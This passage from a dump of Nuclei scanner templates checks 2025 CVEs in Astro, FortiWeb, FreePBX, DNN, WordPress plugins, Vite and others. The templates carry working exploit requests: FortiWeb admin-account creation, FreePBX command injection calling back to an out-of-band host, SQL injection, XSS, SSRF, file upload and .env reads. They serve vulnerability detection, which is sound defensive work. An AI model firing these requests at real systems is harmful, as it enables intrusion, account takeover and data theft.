matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - ';;alert(document.domain)//\"><input class=\"button secondary'\n          - 'onclick=\"location='\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - text/html\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450220680380755d5c5e6203a50d79bdf0d3398dce1994f78b7942def658eb8615d449022100ec6c99a6b70738111bb4dbeffddd08ebc9a5c402c1d6c1ed650794f5c244eb0f:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-66472.yaml","vuln_id":"cve-2025-66472"},{"raw":"id: CVE-2025-64764\n\ninfo:\n  name: Astro - Reflected XSS via server islands feature\n  author: DhiyaneshDk,zhero___\n  severity: high\n  description: |\n    Astro 5.15.8 contains a reflected XSS caused by improper handling of server islands feature, letting remote attackers execute scripts, exploit requires use of server islands in the application.\n  impact: |\n    Remote attackers can execute scripts in users' browsers, potentially leading to session hijacking or data theft.\n  remediation: |\n    Update to version 5.15.8 or later.\n  reference:\n    - https://zhero-web-sec.github.io/research-and-things/unlocking-reflected-xss-in-the-astro-framework\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: html:\"_server-islands\"\n  tags: cve,cve2025,astro,xss,vkev,vuln\n\nvariables:\n  rand: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/\"\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - '/_server-islands/[^?]+\\?e='\n        internal: true\n\n    extractors:\n      - type: regex\n        name: value\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - '/_server-islands/([^?]+)\\?e='\n\n  - raw:\n      - |\n        GET /_server-islands/{{value}}?e=file&p=&s={\"{{rand}}\":\"<img+src=x+onerror=alert(0)>\"} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"<img src=x onerror=alert(0)>\")'\n        condition: and\n# digest: 4b0a00483046022100d5d5b68878bdb973b1eb76ef688075708592992bac4c1cc6652a403e5cd49232022100bacef0ab118df302eeab08ce193705133197b76f489fc230c2f5e418e0696dd0:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-64764.yaml","vuln_id":"cve-2025-64764"},{"raw":"id: CVE-2025-64525\n\ninfo:\n  name: Astro - Broken Access Control\n  author: zhero___,DhiyaneshDK\n  severity: medium\n  description: |\n    Astro 2.16.0 to 5.15.5 contains a broken access control caused by insecure use of unsanitized x-forwarded-proto and x-forwarded-port headers in URL building, letting attackers bypass middleware protection, cause DoS, SSRF, and URL pollution, exploit requires crafted headers.\n  impact: |\n    Attackers can bypass route protection, cause denial of service, perform SSRF, and pollute URLs leading to security bypasses and potential XSS.\n  remediation: |\n    Update to version 5.15.5 or later.\n  reference:\n    - https://github.com/advisories/GHSA-hr2q-hp5q-x767\n    - https://zhero-web-sec.github.io/research-and-things/astro-framework-and-standards-weaponization\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"_astro\"\n  tags: cve,cve2025,astro,ssrf,oast,oob,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/\"\n    headers:\n      x-forwarded-proto: \"http://{{interactsh-url}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: interactsh_request\n        words:\n          - \"User-Agent: Astro-Middleware\"\n          - \"User-Agent: node\"\n        condition: or\n# digest: 4a0a0047304502204a37fcc27cf5ca353dcccfcc76a226902d69d08fc3825d87c86864cf503bff2e022100d77b4d8d90a4d1a01b4e9fe0febbb240b98c8de2bea0df89447096e5b6f495bb:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-64525.yaml","vuln_id":"cve-2025-64525"},{"raw":"id: CVE-2025-64500\n\ninfo:\n  name: Symfony HttpFoundation - Access Control Bypass via PATH_INFO\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    Symfony HttpFoundation component >= 2.0.0 and prior to versions 5.4.50, 6.4.29, and 7.3.7 contains an access control bypass vulnerability. The Request class improperly interprets some PATH_INFO values, producing URL paths without a leading `/`. This allows bypassing access control rules that are built with the `/-prefix` assumption.\n  impact: |\n    Attackers can bypass access control rules, potentially gaining unauthorized access to restricted resources.\n  remediation: Update to Symfony versions 5.4.50, 6.4.29, or 7.3.7 or later.\n  reference:\n    - https://github.com/symfony/symfony/security/advisories/GHSA-3rg7-wf37-54rm\n    - https://symfony.com/blog/cve-2025-64500-incorrect-parsing-of-path-info-can-lead-to-limited-authorization-bypass\n    - https://github.com/symfony/symfony/commit/9962b91b12bb791322fa73836b350836b6db7cac\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-64500\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n    cvss-score: 7.3\n    cve-id: CVE-2025-64500\n    cwe-id: CWE-647\n    epss-score: 0.01325\n    epss-percentile: 0.69703\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: sensiolabs\n    product: symfony\n    shodan-query: cpe:\"cpe:2.3:a:sensiolabs:symfony\"\n  tags: cve,cve2025,symfony,auth-bypass\n\nhttp:\n  - raw:\n      - |\n        GET /{{front_controller}}_profiler/ HTTP/1.1\n        Host: {{Hostname}}\n\n    payloads:\n      front_controller:\n        - \"index.php\"\n        - \"app.php\"\n\n    stop-at-first-match: true\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Symfony Profiler\"\n          - \"<title>Profiler</title>\"\n          - \"Symfony-Debug-Toolbar\"\n        condition: or\n# digest: 490a0046304402203280ccf65599d5db0c28847b53c5b7662970b65bca87f67c887c6ac2d3c7e36202206968e616874e11bdd0f3a48c73f1d36dd6f9aac9eeafe0fe81307d898ffd2f2a:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-64500.yaml","vuln_id":"cve-2025-64500"},{"raw":"id: CVE-2025-64446\n\ninfo:\n  name: FortiWeb - Authentication Bypass\n  author: DhiyaneshDk,watchTowr,rapid7,defusedcyber\n  severity: critical\n  description: |\n    A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.\n  impact: |\n    Attackers can execute administrative commands remotely, potentially leading to full system compromise.\n  remediation: |\n    Update to the latest FortiWeb version beyond 8.0.1.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-64446\n    - https://x.com/defusedcyber/status/1975242250373517373\n    - https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass\n    - https://github.com/rapid7/metasploit-framework/pull/20698/files\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-64446\n    epss-score: 0.91838\n    epss-percentile: 0.99813\n    cwe-id: CWE-23\n    cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: title:\"FortiWeb - \"\n  tags: cve,cve2025,vuln,fortiweb,fortigate,intrusive,auth-bypass,kev,vkev\n\nvariables:\n  username: \"{{to_lower(rand_text_alpha(8))}}\"\n  password: \"{{to_lower(rand_text_alpha(8))}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1\n        Host: {{Hostname}}\n        CGIINFO: eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==\n        Content-Type: application/json\n\n        {\n            \"data\": {\n                \"q_type\": 1,\n                \"name\": \"{{username}}\",\n                \"access-profile\": \"prof_admin\",\n                \"access-profile_val\": \"0\",\n                \"last-name\": \"\",\n                \"first-name\": \"\",\n                \"email-address\": \"\",\n                \"phone-number\": \"\",\n                \"mobile-number\": \"\",\n                \"hidden\": 0,\n                \"comments\": \"\",\n                \"sz_dashboard\": -1,\n                \"type\": \"local-user\",\n                \"type_val\": \"0\",\n                \"admin-usergrp_val\": \"0\",\n                \"wildcard_val\": \"0\",\n                \"accprofile-override_val\": \"0\",\n                \"sshkey\": \"\",\n                \"trusthostv4\": \"127.0.0.1/8\",\n                \"trusthostv6\": \"::1/128\",\n                \"passwd-set-time\": 0,\n                \"history-password-pos\": 0,\n                \"history-password0\": \"\",\n                \"history-password1\": \"\",\n                \"history-password2\": \"\",\n                \"history-password3\": \"\",\n                \"history-password4\": \"\",\n                \"history-password5\": \"\",\n                \"history-password6\": \"\",\n                \"history-password7\": \"\",\n                \"history-password8\": \"\",\n                \"history-password9\": \"\",\n                \"force-password-change\": \"disable\",\n                \"force-password-change_val\": \"0\",\n                \"password\": \"{{password}}\"\n            }\n        }\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"results\":'\n          - '\"can_clone\":'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: dsl\n        dsl:\n          - '\"USERNAME: \"+ username'\n          - '\"PASSWORD: \"+ password'\n# digest: 4a0a0047304502204278acbddc3c1ce8a3b3fd859c92406f6a91ae143a685007ed9134d10edd1e2d022100fc702f3299a18207439414eeb84c2bf3294c83c4f7d488f334d9181f54859fa3:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-64446.yaml","vuln_id":"cve-2025-64446"},{"raw":"id: CVE-2025-64328\n\ninfo:\n  name: FreePBX  >= 17.0.2.36 && < 17.0.3 - Authenticated Command Injection\n  author: _th3y\n  severity: critical\n  description: |\n    FreePBX Endpoint Manager 17.0.2.36 to < 17.0.3 contains a command injection caused by improper sanitization in filestore module's testconnection  check_ssh_connect() function, letting authenticated users execute commands as asterisk user.\n  impact: |\n    Authenticated attackers can execute arbitrary commands as the asterisk user, gaining remote access to the system.\n  remediation: |\n    Upgrade to version 17.0.3 or later.\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\n    cvss-score: 8.6\n    cve-id: CVE-2025-64328\n    epss-score: 0.84618\n    epss-percentile: 0.99693\n    cpe: cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*\n  reference:\n    - https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw\n    - https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/\n    - https://www.cisa.gov/news-events/alerts/2026/02/03/cisa-adds-four-known-exploited-vulnerabilities-catalog\n  metadata:\n    vendor: sangoma\n    product: freepbx\n    shodan-query:\n      - http.title:\"freepbx\"\n      - http.favicon.hash:\"-1908328911\"\n      - http.favicon.hash:\"1574423538\"\n      - http.title:\"freepbx administration\"\n    fofa-query:\n      - icon_hash=\"-1908328911\"\n      - icon_hash=\"1574423538\"\n      - title=\"freepbx administration\"\n      - title=\"freepbx\"\n    google-query:\n      - intitle:\"freepbx administration\"\n      - intitle:\"freepbx\"\n  tags: cve,cve2025,freepbx,rce,oast,authenticated,vuln,kev,vkev\n\nvariables:\n  username: \"{{username}}\"\n  password: \"{{password}}\"\n  cmd: \"nslookup {{interactsh-url}}\"\n  prefix: \"{{rand_text_alpha(5)}}\"\n\nflow: http(1) && http(2)\n\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/admin/config.php\"\n    headers:\n      Content-Type: application/x-www-form-urlencoded\n    body: \"username={{username}}&password={{password}}\"\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'FreePBX Administration'\n          - 'Hello, {{username}}'\n        condition: and\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user={{prefix}}&port=22&key={{prefix}}`{{cmd}}`&path={{prefix}}\"\n    headers:\n      Referer: \"{{BaseURL}}\"\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n          - \"http\"\n# digest: 490a0046304402200160ed94fe66626f4a03b7c693072e4a36eda63ae6cf6b8736454d413156c47402205807dbd9bd7ae7f654f8a8dafd1120c8d0c5fe334b07720e16fd4d50c05d639a:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-64328.yaml","vuln_id":"cve-2025-64328"},{"raw":"id: CVE-2025-64095\n\ninfo:\n  name: DNN - Unrestricted Arbitrary File Upload\n  author: DhiyaneshDk,pussycat0x\n  severity: critical\n  description: |\n    DNN (formerly DotNetNuke) \\u003C 10.1.1 contains an unrestricted file upload vulnerability caused by the default HTML editor provider allowing unauthenticated file uploads and overwriting existing files, letting unauthenticated attackers deface websites and inject XSS payloads, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can upload and overwrite files, leading to website defacement and cross-site scripting attacks.\n  remediation: |\n    Update to version 10.1.1 or later.\n  reference:\n    - https://github.com/h4x0r-dz/CVE-2025-64095---DNN-Unauthenticated-arbitrary-file-upload\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: dnnsoftware\n    product: dotnetnuke\n    shodan-query:\n      - \"Set-Cookie: dnn_IsMobile\"\n      - http.favicon.hash:-1465479343\n    fofa-query:\n      - app=\"dotnetnuke\"\n      - \"Set-Cookie: dnn_IsMobile\"\n      - icon_hash=\"-1465479343\"\n  tags: cve,cve2025,intrusive,file-upload,dnn,vkev,vuln\n\nvariables:\n  filename: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=------------------------7RKjWLYyrhvUn2AA31fJQ3\n\n        --------------------------7RKjWLYyrhvUn2AA31fJQ3\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.png\"\n        Content-Type: image/png\n\n        {{randstr}}\n        --------------------------7RKjWLYyrhvUn2AA31fJQ3\n        Content-Disposition: form-data; name=\"storageFolderID\"\n\n        1\n        --------------------------7RKjWLYyrhvUn2AA31fJQ3\n        Content-Disposition: form-data; name=\"portalID\"\n\n        0\n        --------------------------7RKjWLYyrhvUn2AA31fJQ3\n        Content-Disposition: form-data; name=\"overrideFiles\"\n\n        1\n        --------------------------7RKjWLYyrhvUn2AA31fJQ3\n        Content-Disposition: form-data; name=\"mode\"\n\n        Default\n        --------------------------7RKjWLYyrhvUn2AA31fJQ3--\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '{\"group\"'\n          - 'delete_type'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/plain\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450220593aee7a925531b91cfb4e1d6207b93128e75593529cb8fd3443320129c50ca5022100bf22769ff7423125e8c9efb9a4ef3915b9e195d5eb7de936fc979ca83efebaf3:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-64095.yaml","vuln_id":"cve-2025-64095"},{"raw":"id: CVE-2025-6403\n\ninfo:\n  name: Code-Projects School Fees Payment System 1.0 - SQL Injection\n  author: hnd3884\n  severity: critical\n  description: |\n    A vulnerability was found in code-projects School Fees Payment System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /student.php. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.\n  impact: |\n    Remote attackers can execute arbitrary SQL commands, potentially leading to data theft or modification.\n  remediation: |\n    Update to the latest version.\n  reference:\n    - https://www.cve.org/CVERecord?id=CVE-2025-6403\n    - https://avd.aquasec.com/nvd/2025/cve-2025-6403/\n    - https://github.com/tuooo/CVE/issues/16\n    - https://vuldb.com/?id.313335\n    - https://code-projects.org/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-6403\n    cwe-id: CWE-74\n    epss-score: 0.02\n    epss-percentile: 0.79852\n    cpe: cpe:2.3:a:code-projects:school_fees_payment_system:1.0:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n  tags: cve,cve2025,sqli,code_projects,unauth,school_fees_payment_system,time-based,vkev,vuln\n\nflow: http(1) || http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /student.php?action=delete&id=1'+AND+EXTRACTVALUE(0x0a,CONCAT(0x0a,VERSION()))--+- HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"XPATH syntax error\")'\n        condition: and\n\n  - raw:\n      - |\n        GET /student.php?action=delete&id=1'+AND+SLEEP(7)--+- HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration >= 7'\n          - 'status_code == 302'\n          - 'contains(body, \"login.php\")'\n        condition: and\n# digest: 4a0a0047304502200cc6e496de82b735a685fd7a78692a032a05c9822582b6c31ab1d8b929140b51022100db1046b2ecec7880007f6284632a63850328726e182f8d538acfef9f8acfb428:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-6403.yaml","vuln_id":"cve-2025-6403"},{"raw":"id: CVE-2025-6389\n\ninfo:\n  name: Sneeit WP Social WordPress Plugin - Unauthenticated RCE via call_user_func\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    The Sneeit Framework plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 8.3 via the sneeit_articles_pagination_callback() function. This is due to the function accepting user input and then passing that through call_user_func(). This makes it possible for unauthenticated attackers to execute code on the server which can be leveraged to inject backdoors or, for example, create new administrative user accounts.\n  impact: |\n    Unauthenticated attackers can execute arbitrary code remotely, potentially injecting backdoors or creating new admin accounts.\n  remediation: |\n    Update to the latest version beyond 8.3.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-6389\n    - https://www.cve.org/CVERecord?id=CVE-2025-6389\n    - https://github.com/Nxploited/CVE-2025-6389\n    - https://github.com/itsismarcos/SneeitScanner-CVE-2025-6389\n    - https://wpscan.com/vulnerability/CVE-2025-6389\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-6389\n    cwe-id: CWE-94\n    epss-score: 0.76138\n    epss-percentile: 0.9951\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: sneeit\n    product: sneeit-framework\n    framework: wordpress\n    fofa-query: '\"sneeit_articles_pagination\"'\n    shodan-query: http.html:\"/wp-content/plugins/wp-social/\"\n    publicwww-query: \"/wp-content/plugins/wp-social/\"\n  tags: cve,cve2025,wordpress,wp-plugin,sneeit,rce,unauth,vkev,intrusive,vuln,file-upload\n\nvariables:\n  marker: \"{{randstr}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=sneeit_articles_pagination&callback=var_dump&args=%5B%22{{marker}}%22%5D\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"array(1)\"\n          - \"{{marker}}\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        regex:\n          - 'string\\(\\d+\\) \"([^\"]+)\"'\n        group: 1\n# digest: 4a0a00473045022100988f0d5e6eeaf87c7fdd4aed1f38e75dd51fc10e54ef4863c2de3dc5e3f8562d02202b4c8fe3cc03024dc780d3fa15f6dfeb0e5ad159552f86c544e5a5824bd9c667:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-6389.yaml","vuln_id":"cve-2025-6389"},{"raw":"id: CVE-2025-63387\n\ninfo:\n  name: Dify v1.9.1 - Broken Access Control\n  author: DhiyaneshDK\n  severity: medium\n  description: |\n    Dify v1.9.1 contains an insecure permissions vulnerability caused by lack of authorization checks in /console/api/system-features endpoint, letting unauthenticated attackers access sensitive system configuration data.\n  impact: |\n    Unauthenticated attackers can access sensitive system configuration data, potentially leading to information disclosure.\n  remediation: |\n    Update to the latest version of Dify.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-63387\n  classification:\n    cve-id: CVE-2025-63387\n    epss-score: 0.29929\n    epss-percentile: 0.98123\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: app=\"Dify\"\n  tags: cve,cve2025,dify,auth-bypass,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/console/api/system-features\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"status\":'\n          - '\"sso_enforced_for_signin\":'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a004830460221008b8ecb6df1faff422b5a6ddbb6e3f7275d4ad244af5737f81c95af27bddedc1a02210092e96223d05f7cdee6735ad5b7242ded5938db1a9e58328d7319c8c7dce98552:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-63387.yaml","vuln_id":"cve-2025-63387"},{"raw":"id: CVE-2025-62780\n\ninfo:\n  name: ChangeDetection.io <= v0.50.33 - Stored XSS via Watch API\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    changedetection.io <= 0.50.34 contains a stored cross site scripting caused by insufficient security checks in the Watch update API, letting attackers execute arbitrary JavaScript when users preview malicious links, exploit requires user interaction\n  impact: |\n    Attackers can execute arbitrary JavaScript in users' browsers, potentially stealing data or performing actions on behalf of the user.\n  remediation: |\n    Update to version 0.50.34 or later.\n  reference:\n    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-4c3j-3h7v-22q9\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-62780\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N\n    cvss-score: 6.2\n    cve-id: CVE-2025-62780\n    epss-score: 0.00431\n    epss-percentile: 0.36929\n    cwe-id: CWE-79\n  metadata:\n    max-request: 4\n    verified: true\n    shodan-query: title:\"Change Detection\"\n    fofa-query: title=\"Change Detection\"\n  tags: cve,cve2025,changedetection,xss,stored,api\n\nvariables:\n  string: \"{{to_lower('{{randstr}}')}}\"\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"Change Detection\", \"changedetection.io\")'\n          - 'compare_versions(version, \"<= 0.50.33\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'id=\"right-sticky\">v([0-9.]+)<'\n\n      - type: xpath\n        name: watch_uuid\n        part: body\n        internal: true\n        attribute: id\n        xpath:\n          - \"//table[contains(@class,'watch-table')]//tbody/tr[1]\"\n\n  - raw:\n      - |\n        GET /settings HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"api-key\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: api_key\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'id=\"api-key\">([a-f0-9]+)</span>'\n\n  - raw:\n      - |\n        PUT /api/v1/watch/{{watch_uuid}} HTTP/1.1\n        Host: {{Hostname}}\n        x-api-key: {{api_key}}\n        Content-Type: application/json\n\n        {\"url\":\"javascript:alert(document.domain)\",\"title\":\"{{string}}\",\"paused\":true}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"OK\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /preview/{{watch_uuid}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"javascript:alert(document.domain)\", \"{{string}}\")'\n        condition: and\n# digest: 4a0a00473045022100fce82de1a2d782d5b67a8b7243b2d472985ac5ad616fd29cd24a4f860441e1ba02204d7c2f296a2e2aae7c41561e291b91eea83542c2c6b428c3e8327cfa3fab0282:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-62780.yaml","vuln_id":"cve-2025-62780"},{"raw":"id: CVE-2025-62613\n\ninfo:\n  name: VDO.Ninja - DOM-Based Cross-Site Scripting\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    VDO.Ninja 28.0 to 28.3 contains a reflected XSS caused by improper sanitization of the room parameter in examples/control.html, letting remote attackers execute scripts, exploit requires crafted URL.\n  impact: |\n    Attackers can execute arbitrary scripts in users' browsers, potentially stealing data or performing actions on their behalf.\n  remediation: |\n    Update to version 28.4 or later.\n  reference:\n    - https://github.com/steveseguin/vdo.ninja/security/advisories/GHSA-mp9c-cpch-x73c\n    - https://github.com/steveseguin/vdo.ninja/commit/83c0ac753ad60c7a086daced3244688cabd4f6b8\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-62613\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2025-62613\n    cwe-id: CWE-79\n    epss-score: 0.0116\n    epss-percentile: 0.6575\n  metadata:\n    verified: true\n    max-request: 2\n    fofa-query: body=\"vdo.ninja\"\n  tags: cve,cve2025,xss,vdo-ninja\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/index.html\"\n\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - \"status_code == 200\"\n          - 'contains_any(body, \"www.vdo.ninja\", \"VDO.Ninja\")'\n          - 'contains(body, \"session.version\") && contains_any(body, \"28.0\", \"28.1\", \"28.2\", \"28.3\")'\n        condition: and\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/examples/control.html?room=%3Cimg%20src=x%20onerror=alert(document.domain)%3E\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"text/html\")'\n          - 'contains_all(body, \".innerHTML\", \"roomID\", \"generateStreamID\")'\n          - '!contains(body, \"encodeURIComponent\")'\n        condition: and\n# digest: 490a0046304402207bf28d5d7ffa1cd0875ae6dee387145f3055a25bb0fa4acc85565403971a20ed02204551728dc9117d39831517927887906a555d1f05fce4beeb642bd47efaf52b7e:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-62613.yaml","vuln_id":"cve-2025-62613"},{"raw":"id: CVE-2025-62522\n\ninfo:\n  name: Vite - Information Disclosure\n  author: DhiyaneshDK\n  severity: medium\n  description: |\n    Vite is a frontend tooling framework for JavaScript.In versions from 2.9.18 to before 3.0.0, 3.2.9 to before 4.0.0, 4.5.3 to before 5.0.0, 5.2.6 to before 5.4.21, 6.0.0 to before 6.4.1, 7.0.0 to before 7.0.8, and 7.1.0 to before 7.1.11, files denied by server.fs.deny were sent if the URL ended with \\ when the dev server is running on Windows. Only apps explicitly exposing the Vite dev server to the network and running the dev server on Windows were affected. This issue has been patched in versions 5.4.21, 6.4.1, 7.0.8, and 7.1.11.\n  impact: |\n    Remote attackers can access files denied by server.fs.deny, leading to sensitive information disclosure.\n  remediation: |\n    Update to versions 5.4.21, 6.4.1, 7.0.8, or 7.1.11 or later.\n  reference:\n    - https://github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"/@vite/client\"\n  tags: cve,cve2025,env,vite,disclosure,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /.env/\\ HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(body, \"SESSDATA=\",\"WEIBO_COOKIE=\") || contains(body, \"VITE_\")'\n          - '!contains(tolower(body), \"<html\")'\n        condition: and\n# digest: 4b0a00483046022100fc7d5108c5d1ced3c18116f54dd07949f022d92029582d7f35785e03198622b802210095139dc1603eb729f3f2fca8c1dc5fa492929ae8ada4c74f69b89db61e90d3f9:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-62522.yaml","vuln_id":"cve-2025-62522"},{"raw":"id: CVE-2025-62512\n\ninfo:\n  name: Piwigo - User Enumeration via Password Reset\n  author: DhiyaneshDk\n  severity: medium\n  description: |\n    Piwigo is an open source photo gallery application for the web. In version 15.5.0 and likely earlier 15.x releases, the password reset functionality in Piwigo allows an unauthenticated attacker to determine whether a given username or email address exists in the system. The endpoint at password.php?action=lost returns distinct messages for valid vs. invalid accounts, enabling user enumeration. As of time of publication, no known patches are available.\n  impact: |\n    Unauthenticated attackers can enumerate valid usernames or email addresses, aiding further targeted attacks.\n  